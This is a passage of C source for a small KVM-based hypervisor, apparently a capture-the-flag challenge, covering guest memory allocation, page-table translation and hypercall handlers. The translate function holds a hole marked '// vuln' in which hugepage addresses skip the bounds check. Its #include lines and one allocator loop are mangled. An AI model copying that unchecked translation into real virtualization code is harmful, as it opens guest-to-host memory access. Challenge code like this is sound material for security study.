DEBUG_PRINT("r12=%016llx r13=%016llx r14=%016llx r15=%016llx\n", 29 | regs.r12, regs.r13, regs.r14, regs.r15); 30 | DEBUG_PRINT("rip=%016llx rflags=%016llx\n", regs.rip, regs.rflags); 31 | 32 | struct kvm_sregs sregs; 33 | r = ioctl(vcpufd, KVM_GET_SREGS, &sregs); 34 | assert(r != -1); 35 | 36 | dump_segment_register("cs", &sregs.cs); 37 | dump_segment_register("ds", &sregs.ds); 38 | dump_segment_register("es", &sregs.es); 39 | dump_segment_register("ss", &sregs.ss); 40 | dump_segment_register("tr", &sregs.tr); 41 | 42 | dump_dtable("gdt", &sregs.gdt); 43 | dump_dtable("ldt", &sregs.ldt); 44 | 45 | DEBUG_PRINT("cr0=%016llx\n", sregs.cr0); 46 | DEBUG_PRINT("cr2=%016llx\n", sregs.cr2); 47 | DEBUG_PRINT("cr3=%016llx\n", sregs.cr3); 48 | } 49 | -------------------------------------------------------------------------------- /kvm/utils/debug.h: -------------------------------------------------------------------------------- 1 | #ifndef _DEBUG_H 2 | #define _DEBUG_H 3 | 4 | void dump_regs(int vcpufd); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /kvm/utils/module.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "vm/vm.h" 9 | #include "utils/palloc.h" 10 | #include "utils/module.h" 11 | 12 | struct modules { 13 | unsigned nmod; 14 | int fds[]; 15 | } *mod_list; 16 | 17 | int init_modules(unsigned nmod, char *list[]){ 18 | int n = 0; 19 | 20 | if(!(mod_list = (struct modules*)malloc(sizeof(struct modules)+sizeof(int)*nmod))) 21 | return -1; 22 | 23 | for(int i = 0; i < nmod; i++){ 24 | int fd; 25 | struct stat stbuf; 26 | 27 | if((fd = open(list[i], O_RDONLY)) < 0){ 28 | perror(list[i]); 29 | continue; 30 | } 31 | 32 | if(fstat(fd, &stbuf) < -1){ 33 | perror("fstat"); 34 | goto err; 35 | } 36 | 37 | if(!S_ISREG(stbuf.st_mode)){ 38 | fprintf(stderr, "%s: Not a regular file\n", list[i]); 39 | goto err; 40 | } 41 | 42 | mod_list->fds[n++] = fd; 43 | continue; 44 | 45 | err: 46 | close(fd); 47 | } 48 | 49 | mod_list->nmod = n; 50 | if(!(mod_list = (struct modules*)realloc(mod_list, sizeof(struct modules)+sizeof(int)*n))) 51 | return -1; 52 | 53 | return n; 54 | } 55 | 56 | void fini_modules(void){ 57 | if(!mod_list) 58 | return; 59 | 60 | int nmod = mod_list->nmod; 61 | for(int i = 0; i < nmod; i++){ 62 | int fd = mod_list->fds[i]; 63 | if(fd >= 0) 64 | close(fd); 65 | } 66 | 67 | free(mod_list); 68 | mod_list = NULL; 69 | } 70 | 71 | int load_module(struct vm *vm, int id, uint64_t addr, off_t offset, size_t size){ 72 | int nmod; 73 | int fd; 74 | size_t aligned_size; 75 | 76 | if(!mod_list) 77 | return -1; 78 | nmod = mod_list->nmod; 79 | 80 | if(id >= nmod) 81 | return -1; 82 | fd = mod_list->fds[id]; 83 | 84 | if(fd < 0) 85 | return -1; 86 | 87 | if(!size){ 88 | struct stat stbuf; 89 | 90 | if(fstat(fd, &stbuf) < 0){ 91 | perror("fstat"); 92 | return -1; 93 | } 94 | 95 | size = stbuf.st_size; 96 | } 97 | 98 | if((addr = palloc(addr, aligned_size = (size + 0x1000-1) & ~0xfff)) == -1){ 99 | perror("palloc"); 100 | return -1; 101 | } 102 | memset(guest2host(vm, addr), 0, aligned_size); 103 | 104 | if(lseek(fd, offset, SEEK_SET) == -1){ 105 | perror("lseek"); 106 | return -1; 107 | } 108 | 109 | if(read(fd, guest2host(vm, addr), size) == -1){ 110 | perror("read"); 111 | return -1; 112 | } 113 | 114 | return addr; 115 | } 116 | 117 | int load_kernel(struct vm *vm){ 118 | return load_module(vm, 0, 0, 0, 0); 119 | } 120 | -------------------------------------------------------------------------------- /kvm/utils/module.h: -------------------------------------------------------------------------------- 1 | #ifndef _MODULE_H 2 | #define _MODULE_H 3 | 4 | int init_modules(unsigned nmod, char *list[]); 5 | void fini_modules(void); 6 | int load_module(struct vm *vm, int id, uint64_t addr, off_t offset, size_t size); 7 | int load_kernel(struct vm *vm); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /kvm/utils/palloc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define NBINS 128 7 | #define NSMALLBINS 64 8 | 9 | #define SMALLBIN_WIDTH GMALLOC_ALIGNMENT 10 | 11 | #define MIN_LARGE_SIZE (NSMALLBINS * SMALLBIN_WIDTH) 12 | #define IN_SMALLBIN_RANGE(sz) ((sz) < MIN_LARGE_SIZE) 13 | 14 | #define SMALLBIN_INDEX(sz) (((uint64_t)(sz)) >> 12) 15 | #define LARGEBIN_INDEX(sz) \ 16 | (((((uint64_t) (sz)) >> 14) <= 48) ? 48 + (((uint64_t) (sz)) >> 14) :\ 17 | ((((uint64_t) (sz)) >> 17) <= 20) ? 91 + (((uint64_t) (sz)) >> 17) :\ 18 | ((((uint64_t) (sz)) >> 20) <= 10) ? 110 + (((uint64_t) (sz)) >> 20) :\ 19 | ((((uint64_t) (sz)) >> 23) <= 4) ? 119 + (((uint64_t) (sz)) >> 23) :\ 20 | ((((uint64_t) (sz)) >> 27) <= 2) ? 124 + (((uint64_t) (sz)) >> 27) : 126) 21 | 22 | #define GMALLOC_ALIGNMENT (1 << 12) 23 | #define GMALLOC_ALIGN_MASK (GMALLOC_ALIGNMENT - 1) 24 | #define MINSIZE GMALLOC_ALIGNMENT 25 | #define REQUEST2SIZE(req) ((req) < MINSIZE ? MINSIZE : ((req) + GMALLOC_ALIGN_MASK) & ~GMALLOC_ALIGN_MASK) 26 | 27 | #define BIN_AT(av, idx) \ 28 | ((gmbinptr)((void*)&((av)->bins[(idx) * 2]) - offsetof(struct gmem_chunk, fd))) 29 | #define FIRST(b) ((b)->fd) 30 | #define LAST(b) ((b)->bk) 31 | 32 | #define CHUNK_MEM(p) ((p)->addr) 33 | #define CHUNK_SIZE(p) ((p)->size) 34 | #define INUSE(p) ((p)->fd == NULL) 35 | 36 | 37 | struct gmem_chunk { 38 | uint64_t addr; 39 | size_t size; 40 | struct gmem_chunk *fd, *bk; // free list 41 | struct gmem_chunk *next, *prev; // all chunks 42 | }; 43 | typedef struct gmem_chunk *gmchunkptr, *gmbinptr; 44 | 45 | struct gmem_state { 46 | unsigned initialized; 47 | 48 | gmchunkptr top; 49 | gmbinptr bins[NBINS*2]; 50 | 51 | size_t inuse; 52 | size_t system_mem; 53 | } arena; 54 | typedef struct gmem_state *gmstate; 55 | 56 | static gmchunkptr _int_palloc(gmstate av, size_t bytes); 57 | static gmchunkptr _int_palloc_manual(gmstate av, uint64_t addr, size_t bytes); 58 | static void _int_pfree(gmstate av, gmchunkptr p); 59 | 60 | void init_gmem_manage(size_t mem_size){ 61 | gmstate av = &arena; 62 | gmchunkptr top; 63 | 64 | top = (gmchunkptr)calloc(1, sizeof(struct gmem_chunk)); 65 | top->addr = 0; 66 | top->size = mem_size; 67 | top->fd = top->bk = NULL; 68 | top->next = top->prev = NULL; 69 | 70 | av->top = top; 71 | av->inuse = 0; 72 | av->system_mem = mem_size; 73 | 74 | for(int i = 0; i < NBINS; i++){ 75 | gmbinptr bin = BIN_AT(av, i); 76 | bin->fd = bin->bk = bin; 77 | } 78 | 79 | av->initialized = 1; 80 | } 81 | 82 | uint64_t palloc(uint64_t addr, size_t bytes){ 83 | gmstate av = &arena; 84 | gmchunkptr p; 85 | 86 | if(!av->initialized || addr > av->system_mem || bytes > av->system_mem - av->inuse) 87 | return -1; 88 | 89 | if((p = addr ? _int_palloc_manual(av, addr, bytes) : _int_palloc(av, bytes))){ 90 | uint64_t mem; 91 | 92 | assert((mem = CHUNK_MEM(p)) < av->system_mem); 93 | av->inuse += CHUNK_SIZE(p); 94 | 95 | return mem; 96 | } 97 | 98 | return -1; 99 | } 100 | 101 | int pfree(uint64_t addr){ 102 | gmstate av = &arena; 103 | gmchunkptr p; 104 | 105 | if(!av->initialized || addr > av->system_mem) 106 | return -1; 107 | 108 | for(p = av->top; p; p = p->prev) 109 | if(CHUNK_MEM(p) == addr){ 110 | _int_pfree(av, p); 111 | av->inuse -= CHUNK_SIZE(p); 112 | return 0; 113 | } 114 | 115 | return -1; 116 | } 117 | 118 | uint64_t get_gmem_info(int menu){ 119 | gmstate av = &arena; 120 | 121 | switch(menu){ 122 | case 0: 123 | return av->initialized; 124 | case 1: 125 | return av->system_mem; 126 | case 2: 127 | return av->inuse; 128 | } 129 | return -1; 130 | } 131 | 132 | static void unlink_freelist(gmchunkptr p); 133 | static void link_bins(gmstate av, gmchunkptr p); 134 | static void _alloc_split(gmstate av, gmchunkptr p, size_t nb); 135 | static gmchunkptr _alloc_top(gmstate av, size_t nb); 136 | 137 | static gmchunkptr _int_palloc(gmstate av, size_t bytes){ 138 | gmchunkptr victim; 139 | 140 | size_t nb; 141 | unsigned idx; 142 | gmbinptr bin; 143 | 144 | nb = REQUEST2SIZE(bytes); 145 | 146 | if(IN_SMALLBIN_RANGE(nb)){ 147 | idx = SMALLBIN_INDEX(nb); 148 | bin = BIN_AT(av, idx); 149 | 150 | if((victim = LAST(bin)) && victim != bin){ 151 | unlink_freelist(victim); 152 | goto alloc_complete; 153 | } 154 | 155 | idx++; 156 | } 157 | else { 158 | idx = LARGEBIN_INDEX(nb); 159 | bin = BIN_AT(av, idx); 160 | 161 | if((victim = FIRST(bin)) == bin || CHUNK_SIZE(victim) < nb) 162 | goto next_bin; 163 | 164 | for(victim = LAST(bin); CHUNK_SIZE(victim) < nb; victim = victim->bk); 165 | 166 | unlink_freelist(victim); 167 | _alloc_split(av, victim, nb); 168 | 169 | goto alloc_complete; 170 | } 171 | 172 | next_bin: 173 | for(; idx= NSMALLBINS){ 180 | if(CHUNK_SIZE(victim) < nb) 181 | continue; 182 | 183 | for(victim = LAST(bin); CHUNK_SIZE(victim) < nb; victim = victim->bk); 184 | } 185 | 186 | unlink_freelist(victim); 187 | _alloc_split(av, victim, nb); 188 | 189 | goto alloc_complete; 190 | } 191 | 192 | if(!(victim = _alloc_top(av, nb))) 193 | return NULL; 194 | 195 | alloc_complete: 196 | return victim; 197 | } 198 | 199 | static gmchunkptr _int_palloc_manual(gmstate av, uint64_t addr, size_t bytes){ 200 | gmchunkptr victim, tmp = NULL; 201 | size_t nb; 202 | 203 | if(addr & GMALLOC_ALIGN_MASK) 204 | return NULL; 205 | 206 | nb = REQUEST2SIZE(bytes); 207 | 208 | for(victim = av->top; victim && CHUNK_MEM(victim) > addr; victim = victim->prev); 209 | 210 | if(!victim) 211 | return NULL; 212 | 213 | if(victim == av->top){ 214 | if(addr-CHUNK_MEM(victim) > 0){ 215 | _alloc_split(av, victim, addr-CHUNK_MEM(victim)); 216 | tmp = victim; 217 | } 218 | 219 | victim = _alloc_top(av, nb); 220 | } 221 | else { 222 | if(INUSE(victim) || CHUNK_MEM(victim)+CHUNK_SIZE(victim) < addr+nb) 223 | return NULL; 224 | 225 | if(addr-CHUNK_MEM(victim) > 0){ 226 | _alloc_split(av, victim, addr-CHUNK_MEM(victim)); 227 | tmp = victim; 228 | victim = victim->next; 229 | } 230 | 231 | _alloc_split(av, victim, nb); 232 | } 233 | 234 | if(tmp) 235 | _int_pfree(av, tmp); 236 | 237 | return victim; 238 | } 239 | 240 | static void _int_pfree(gmstate av, gmchunkptr p){ 241 | gmchunkptr next, prev; 242 | 243 | next = p->next; 244 | prev = p->prev; 245 | 246 | if(CHUNK_MEM(p)) 247 | assert(prev); 248 | assert(next); 249 | 250 | if(prev && !INUSE(prev)){ 251 | unlink_freelist(prev); 252 | 253 | prev->next = next; 254 | next->prev = prev; 255 | CHUNK_SIZE(prev) += CHUNK_SIZE(p); 256 | 257 | free(p); 258 | p = prev; 259 | prev = p->prev; 260 | } 261 | 262 | if(next == av->top){ 263 | gmchunkptr top = av->top; 264 | 265 | prev->next = top; 266 | top->prev = prev; 267 | 268 | CHUNK_MEM(top) = CHUNK_MEM(p); 269 | CHUNK_SIZE(top) += CHUNK_SIZE(p); 270 | 271 | free(p); 272 | return; 273 | } 274 | 275 | if (!INUSE(next)){ 276 | unlink_freelist(next); 277 | 278 | prev->next = next; 279 | next->prev = prev; 280 | CHUNK_MEM(next) = CHUNK_MEM(p); 281 | CHUNK_SIZE(next) += CHUNK_SIZE(p); 282 | 283 | free(p); 284 | p = next; 285 | } 286 | 287 | link_bins(av, p); 288 | } 289 | 290 | static void unlink_freelist(gmchunkptr p){ 291 | gmchunkptr fwd, bck; 292 | 293 | fwd = p->fd; 294 | bck = p->bk; 295 | 296 | assert(fwd->bk == p && bck->fd == p); 297 | 298 | fwd->bk = bck; 299 | bck->fd = fwd; 300 | 301 | p->fd = p->bk = NULL; 302 | } 303 | 304 | static void link_bins(gmstate av, gmchunkptr p){ 305 | gmchunkptr fwd, bck; 306 | size_t size; 307 | unsigned idx; 308 | 309 | assert(p->fd == NULL && p->bk == NULL); 310 | 311 | size = CHUNK_SIZE(p); 312 | if(IN_SMALLBIN_RANGE(size)){ 313 | idx = SMALLBIN_INDEX(size); 314 | bck = BIN_AT(av, idx); 315 | fwd = bck->fd; 316 | } 317 | else { 318 | idx = LARGEBIN_INDEX(size); 319 | bck = BIN_AT(av, idx); 320 | fwd = bck->fd; 321 | 322 | if(fwd == bck) 323 | goto link; 324 | 325 | if(size < CHUNK_SIZE(bck->bk)){ 326 | fwd = bck; 327 | bck = fwd->bk; 328 | goto link; 329 | } 330 | 331 | while(size < CHUNK_SIZE(fwd)) 332 | fwd = fwd->fd; 333 | 334 | bck = fwd->bk; 335 | } 336 | 337 | link: 338 | p->fd = fwd; 339 | p->bk = bck; 340 | bck->fd = fwd->bk = p; 341 | } 342 | 343 | static void _alloc_split(gmstate av, gmchunkptr p, size_t nb){ 344 | size_t size, remainder_size; 345 | gmchunkptr remainder; 346 | 347 | size = CHUNK_SIZE(p); 348 | assert(nb && size >= nb); 349 | 350 | remainder_size = size - nb; 351 | if(!remainder_size) 352 | return; 353 | 354 | remainder = (gmchunkptr)calloc(1, sizeof(struct gmem_chunk)); 355 | CHUNK_MEM(remainder) = CHUNK_MEM(p) + nb; 356 | CHUNK_SIZE(remainder) = remainder_size; 357 | remainder->next = p->next; 358 | remainder->prev = p; 359 | 360 | p->size = nb; 361 | p->next = remainder; 362 | 363 | if(p == av->top){ 364 | remainder->fd = remainder->bk = NULL; 365 | av->top = remainder; 366 | } 367 | else 368 | link_bins(av, remainder); 369 | } 370 | 371 | static gmchunkptr _alloc_top(gmstate av, size_t nb){ 372 | gmchunkptr victim; 373 | 374 | victim = av->top; 375 | if(!victim || CHUNK_SIZE(victim) < nb) 376 | return NULL; 377 | 378 | _alloc_split(av, victim, nb); 379 | 380 | return victim; 381 | } 382 | -------------------------------------------------------------------------------- /kvm/utils/palloc.h: -------------------------------------------------------------------------------- 1 | #ifndef _MEM_MANAGE_H 2 | #define _MEM_MANAGE_H 3 | 4 | #include 5 | 6 | void init_gmem_manage(size_t mem_size); 7 | uint64_t palloc(uint64_t addr, size_t size); 8 | int pfree(uint64_t addr); 9 | uint64_t get_gmem_info(int menu); 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /kvm/utils/translate.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "vm/vm.h" 6 | #include "bits.h" 7 | 8 | /* 9 | uint64_t translate(int vcpufd, uint64_t addr, int writeable, int user){ 10 | struct kvm_translation trans; 11 | 12 | trans.linear_address = addr; 13 | trans.usermode = 3; 14 | if(ioctl(vcpufd, KVM_TRANSLATE, &trans)){ 15 | perror("ioctl KVM_TRANSLATE"); 16 | return 0; 17 | } 18 | 19 | printf("la %p -> pa:%p, v:%d w:%x, u:%x\n", addr, trans.physical_address, trans.valid, trans.writeable, trans.usermode); 20 | 21 | if(!trans.valid) 22 | return 0; 23 | 24 | //if(writeable && !trans.writeable) 25 | // return 0; 26 | 27 | //if(user && !trans.usermode) 28 | // return 0; 29 | 30 | return trans.physical_address; 31 | } 32 | */ 33 | 34 | #define CHK_PERMISSION(entry) (((entry) & PDE64_PRESENT) && \ 35 | (!user || (entry) & PDE64_USER) && \ 36 | (!write || (entry) & PDE64_RW)) 37 | uint64_t translate(struct vm *vm, uint64_t pml4_addr, uint64_t laddr, int write, int user){ 38 | uint16_t idx[] = { (laddr>>39) & 0x1ff, (laddr>>30) & 0x1ff, (laddr>>21) & 0x1ff, (laddr>>12) & 0x1ff }; 39 | uint64_t paddr = -1; 40 | 41 | uint64_t *pml4 = guest2host(vm, pml4_addr); 42 | 43 | uint64_t pdpt_addr = pml4[idx[0]] & ~0xfff; 44 | if(!CHK_PERMISSION(pml4[idx[0]])) 45 | goto end; 46 | uint64_t *pdpt = guest2host(vm, pdpt_addr); 47 | 48 | uint64_t pd_addr = pdpt[idx[1]] & ~0xfff; 49 | if(!CHK_PERMISSION(pdpt[idx[1]])) 50 | goto end; 51 | uint64_t *pd = guest2host(vm, pd_addr); 52 | 53 | uint64_t pt_addr = pd[idx[2]] & ~0xfff; 54 | if(!CHK_PERMISSION(pd[idx[2]])) 55 | goto end; 56 | if(pd[idx[2]] & PDE64_PS){ 57 | if(pd[idx[2]] & PDE64_USER) // user does not support hugepage 58 | goto end; 59 | 60 | paddr = pt_addr | (laddr&0x1fffff); 61 | goto end; // vuln 62 | } 63 | 64 | uint64_t *pt = guest2host(vm, pt_addr); 65 | if(!CHK_PERMISSION(pt[idx[3]])) 66 | goto end; 67 | 68 | paddr = (pt[idx[3]] & ~0xfff) | (laddr&0xfff); 69 | assert_addr(vm, paddr); 70 | end: 71 | //printf("laddr:%p -> paddr:%p\n", laddr, paddr); 72 | return paddr; 73 | } 74 | -------------------------------------------------------------------------------- /kvm/utils/translate.h: -------------------------------------------------------------------------------- 1 | #ifndef _TRANSLATION_H 2 | #define _TRANSLATION_H 3 | 4 | #include 5 | #include "vm/vm.h" 6 | 7 | //uint64_t translate(int vcpufd, uint64_t addr, int writeable, int user); 8 | uint64_t translate(struct vm *vm, uint64_t pml4_addr, uint64_t addr, int write, int user); 9 | 10 | #endif 11 | -------------------------------------------------------------------------------- /kvm/vm/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := vm.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /kvm/vm/kvm_handler.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "vm/vm.h" 8 | #include "vm/kvm_handler.h" 9 | #include "utils/translate.h" 10 | #include "utils/palloc.h" 11 | #include "utils/module.h" 12 | 13 | #define foreach_gpage(a, l) \ 14 | for(uint64_t size, gvaddr = (a), len = (l), endaddr = gvaddr + len; \ 15 | endaddr > gvaddr && (size = ((endaddr & ~((1<<12)-1)) > gvaddr) ? (((~gvaddr)+1) & ((1<<12)-1) ?: 1<<12) : len ) > 0; \ 16 | gvaddr += size, len -= size) 17 | 18 | int kvm_handle_io(struct vm *vm, struct vcpu *vcpu){ 19 | /* 20 | int vcpufd = vcpu->fd; 21 | struct kvm_run *run = vcpu->run; 22 | */ 23 | return 0; 24 | } 25 | 26 | int kvm_handle_hypercall(struct vm *vm, struct vcpu *vcpu){ 27 | struct kvm_regs regs; 28 | struct kvm_sregs sregs; 29 | int vcpufd = vcpu->fd; 30 | unsigned long ret = -1; 31 | 32 | if(ioctl(vcpufd, KVM_GET_REGS, ®s) < 0){ 33 | perror("ioctl KVM_GET_REGS"); 34 | return -1; 35 | } 36 | if(ioctl(vcpufd, KVM_GET_SREGS, &sregs) < 0){ 37 | perror("ioctl KVM_GET_SREGS"); 38 | return -1; 39 | } 40 | 41 | unsigned nr = regs.rax; 42 | unsigned long arg[] = {regs.rbx, regs.rcx, regs.rdx, regs.rsi}; 43 | 44 | #ifdef DEBUG 45 | printf("nr : %d\n", nr); 46 | #endif 47 | switch(nr){ 48 | case 0x10: // read(0, buf, size) 49 | ret = 0; 50 | foreach_gpage(arg[0], arg[1]){ // uint64_t gvaddr, size; 51 | ssize_t n; 52 | uint64_t gpaddr; 53 | 54 | if((gpaddr = translate(vm, sregs.cr3, gvaddr, 1, arg[2])) == -1) 55 | break; 56 | n = read(STDIN_FILENO, guest2host(vm, gpaddr), size); 57 | ret += n; 58 | 59 | if(n < size) 60 | break; 61 | } 62 | break; 63 | case 0x11: // write(1, buf, size) 64 | ret = 0; 65 | foreach_gpage(arg[0], arg[1]){ // uint64_t gvaddr, size; 66 | ssize_t n; 67 | uint64_t gpaddr; 68 | 69 | if((gpaddr = translate(vm, sregs.cr3, gvaddr, 0, arg[2])) == -1) 70 | break; 71 | n = write(STDOUT_FILENO, guest2host(vm, gpaddr), size); 72 | ret += n; 73 | 74 | if(n < size) 75 | break; 76 | } 77 | break; 78 | case 0x20: 79 | ret = get_gmem_info(arg[0]); 80 | break; 81 | case 0x21: // palloc(phys_addr, size=0) 82 | if((ret = palloc(arg[0], arg[1])) != -1) 83 | memset(guest2host(vm, ret), 0, arg[1]); 84 | break; 85 | case 0x22: // pfree(phys_addr); 86 | ret = pfree(arg[0]); 87 | break; 88 | case 0x30: // load_module(id, phys_addr=0, offset=0, size=0) 89 | ret = load_module(vm, arg[0], arg[1], arg[2], arg[3]); 90 | break; 91 | } 92 | #ifdef DEBUG 93 | printf("ret : %d\n", ret); 94 | #endif 95 | 96 | regs.rax = ret; 97 | regs.rip += 3; 98 | 99 | if(ioctl(vcpufd, KVM_SET_REGS, ®s) < 0){ 100 | perror("ioctl KVM_SET_REGS"); 101 | return -1; 102 | } 103 | 104 | return 0; 105 | } 106 | 107 | #define MSR_STAR 0xc0000081; 108 | #define MSR_LSTAR 0xc0000082; 109 | #define MSR_SFMASK 0xc0000084; 110 | 111 | /* 112 | #define base(s) ((((s)>>16)&0xffffff) | ((((s)>>56)&0xff)<<24)) 113 | #define limit(s) (((s)&0xffff) | ((((s)>>48)&0xf)<<16)) 114 | #define type(s) (((s)>>40)&0xf) 115 | #define s(s) (((s)>>44)&1) 116 | #define dpl(s) (((s)>>45)&3) 117 | #define present(s) (((s)>>47)&1) 118 | #define l(s) (((s)>>53)&1) 119 | #define db(s) (((s)>>54)&1) 120 | #define g(s) (((s)>>55)&1) 121 | 122 | #define extract_segment(sel, sval) { \ 123 | .selector = (sel), \ 124 | .base = base((sval)), \ 125 | .limit = limit((sval)), \ 126 | .type = type((sval)), \ 127 | .s = s((sval)), \ 128 | .dpl = dpl((sval)), \ 129 | .present = present((sval)), \ 130 | .l = l((sval)), \ 131 | .db = db((sval)), \ 132 | .g = g((sval)), \ 133 | } 134 | */ 135 | 136 | int kvm_handle_syscall(struct vm *vm, struct vcpu *vcpu){ 137 | int vcpufd = vcpu->fd; 138 | int ret = -1; 139 | 140 | struct kvm_regs regs; 141 | struct kvm_sregs sregs; 142 | struct kvm_msrs *msrs = (struct kvm_msrs*)malloc(sizeof(struct kvm_msrs)+sizeof(struct kvm_msr_entry)*3); 143 | 144 | if(!msrs) 145 | return -1; 146 | 147 | msrs->nmsrs = 3; 148 | msrs->entries[0].index = MSR_STAR; 149 | msrs->entries[1].index = MSR_LSTAR; 150 | msrs->entries[2].index = MSR_SFMASK; 151 | 152 | if(ioctl(vcpufd, KVM_GET_MSRS, msrs) < 0){ 153 | perror("ioctl KVM_GET_MSRS"); 154 | goto err; 155 | } 156 | if(ioctl(vcpufd, KVM_GET_REGS, ®s) < 0){ 157 | perror("ioctl KVM_GET_REGS"); 158 | goto err; 159 | } 160 | if(ioctl(vcpufd, KVM_GET_SREGS, &sregs) < 0){ 161 | perror("ioctl KVM_GET_SREGS"); 162 | goto err; 163 | } 164 | 165 | uint16_t kernel_cs = msrs->entries[0].data >> 32; 166 | uint64_t syscall_handler = msrs->entries[1].data; 167 | uint64_t flag_mask = msrs->entries[2].data; 168 | 169 | regs.rcx = regs.rip + 2; 170 | regs.r11 = regs.rflags; 171 | regs.rip = syscall_handler; 172 | regs.rflags &= flag_mask; 173 | //printf("%x:%p\n", kernel_cs, regs.rip); 174 | 175 | /* 176 | uint64_t *gdt_base = (uint64_t*)translate(vcpufd, sregs.gdt.base); 177 | if(!gdt_base) 178 | goto err; 179 | 180 | gdt_base = (uint64_t*)guest2host(vm, (uint64_t)gdt_base); 181 | 182 | uint64_t cs_raw = gdt_base[kernel_cs/8], ss_raw = gdt_base[kernel_cs/8 + 1]; 183 | struct kvm_segment cs = extract_segment(kernel_cs, cs_raw); 184 | struct kvm_segment ss = extract_segment(kernel_cs + 8, ss_raw); 185 | */ 186 | struct kvm_segment seg = { 187 | .base = 0, 188 | .limit = 0xffffffff, 189 | .selector = kernel_cs, 190 | .present = 1, 191 | .type = 11, 192 | .dpl = 0, 193 | .db = 0, 194 | .s = 1, 195 | .l = 1, 196 | .g = 1, 197 | }; 198 | sregs.cs = seg; 199 | seg.type = 3; 200 | seg.selector = kernel_cs + 8; 201 | sregs.ss = seg; 202 | 203 | if(ioctl(vcpufd, KVM_SET_SREGS, &sregs) < 0){ 204 | perror("ioctl KVM_SET_SREGS"); 205 | goto err; 206 | } 207 | 208 | if(ioctl(vcpufd, KVM_SET_REGS, ®s) < 0){ 209 | perror("ioctl KVM_SET_REGS"); 210 | goto err; 211 | } 212 | 213 | ret = 0; 214 | err: 215 | free(msrs); 216 | return ret; 217 | } 218 | -------------------------------------------------------------------------------- /kvm/vm/kvm_handler.h: -------------------------------------------------------------------------------- 1 | #ifndef _KVM_HANDLER_H 2 | #define _KVM_HANDLER_H 3 | 4 | #include 5 | #include "vm.h" 6 | 7 | int kvm_handle_io(struct vm *vm, struct vcpu *vcpu); 8 | int kvm_handle_hypercall(struct vm *vm, struct vcpu *vcpu); 9 | int kvm_handle_syscall(struct vm *vm, struct vcpu *vcpu); 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /kvm/vm/vm.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include "bits.h" 12 | #include "vm/vm.h" 13 | #include "vm/kvm_handler.h" 14 | #include "utils/palloc.h" 15 | #include "utils/translate.h" 16 | #include "utils/debug.h" 17 | 18 | static int init_vcpu(int fd, struct vm *vm); 19 | static int init_memory(struct vm *vm); 20 | static int set_long_mode(struct vm *vm, int vcpufd); 21 | 22 | struct vm *init_vm(unsigned ncpu, size_t mem_size){ 23 | struct vm *vm = NULL; 24 | int fd, vmfd; 25 | 26 | if(ncpu < 1 || ncpu > 4) 27 | return NULL; 28 | 29 | if((fd = open("/dev/kvm", O_RDONLY)) < 0){ 30 | perror("open /dev/kvm"); 31 | goto end; 32 | } 33 | 34 | if((vmfd = ioctl(fd, KVM_CREATE_VM, 0)) < 0){ 35 | perror("ioctl KVM_CREATE_VM"); 36 | goto end; 37 | } 38 | 39 | if(!(vm = (struct vm*)calloc(sizeof(struct vm)+sizeof(struct vcpu)*ncpu, 1))){ 40 | perror("malloc (struct vm)"); 41 | goto end; 42 | } 43 | 44 | vm->vmfd = vmfd; 45 | vm->ncpu = ncpu; 46 | vm->mem_size = mem_size; 47 | init_gmem_manage(mem_size); 48 | 49 | if(init_vcpu(fd, vm) < ncpu || init_memory(vm) < 0){ 50 | free(vm); 51 | vm = NULL; 52 | } 53 | 54 | end: 55 | close(fd); 56 | return vm; 57 | } 58 | 59 | static int init_vcpu(int fd, struct vm *vm){ 60 | size_t mmap_size; 61 | int i; 62 | 63 | if((mmap_size = ioctl(fd, KVM_GET_VCPU_MMAP_SIZE, NULL)) <= 0){ 64 | perror("ioctl KVM_GET_VCPU_MMAP_SIZE"); 65 | return -1; 66 | } 67 | 68 | for(i = 0; i < vm->ncpu; i++){ 69 | struct vcpu *vcpu = &vm->vcpu[i]; 70 | int vcpufd; 71 | struct kvm_run *run; 72 | 73 | if((vcpufd = ioctl(vm->vmfd, KVM_CREATE_VCPU, i)) < 0){ 74 | perror("ioctl KVM_CREATE_VCPU"); 75 | break; 76 | } 77 | 78 | run = (struct kvm_run *)mmap(NULL, mmap_size, PROT_READ|PROT_WRITE, MAP_SHARED, vcpufd, 0); 79 | if(run == MAP_FAILED){ 80 | perror("mmap (struct kvm_run)"); 81 | break; 82 | } 83 | 84 | vcpu->fd = vcpufd; 85 | vcpu->run = run; 86 | } 87 | 88 | return i; 89 | } 90 | 91 | static int init_memory(struct vm *vm){ 92 | size_t mem_size = vm->mem_size; 93 | void *mem; 94 | 95 | mem = mmap(NULL, mem_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0); 96 | if (mem == MAP_FAILED) { 97 | perror("mmap mem"); 98 | return -1; 99 | } 100 | 101 | vm->mem = mem; 102 | madvise(mem, mem_size, MADV_MERGEABLE); 103 | 104 | struct kvm_userspace_memory_region region = { 105 | .slot = 0, 106 | .flags = 0, 107 | .guest_phys_addr = 0, 108 | .memory_size = mem_size, 109 | .userspace_addr = (uint64_t)mem 110 | }; 111 | 112 | if (ioctl(vm->vmfd, KVM_SET_USER_MEMORY_REGION, ®ion) < 0){ 113 | perror("ioctl KVM_SET_USER_MEMORY_REGION"); 114 | goto error; 115 | } 116 | 117 | return 0; 118 | 119 | error: 120 | munmap(mem, mem_size); 121 | return -1; 122 | } 123 | 124 | int run_vm(struct vm *vm, unsigned vcpuid, uint64_t entry){ 125 | if(vcpuid < 0 || vcpuid >= vm->ncpu) 126 | return -1; 127 | 128 | struct vcpu *vcpu = &vm->vcpu[vcpuid]; 129 | int vcpufd = vcpu->fd; 130 | struct kvm_run *run = vcpu->run; 131 | 132 | struct 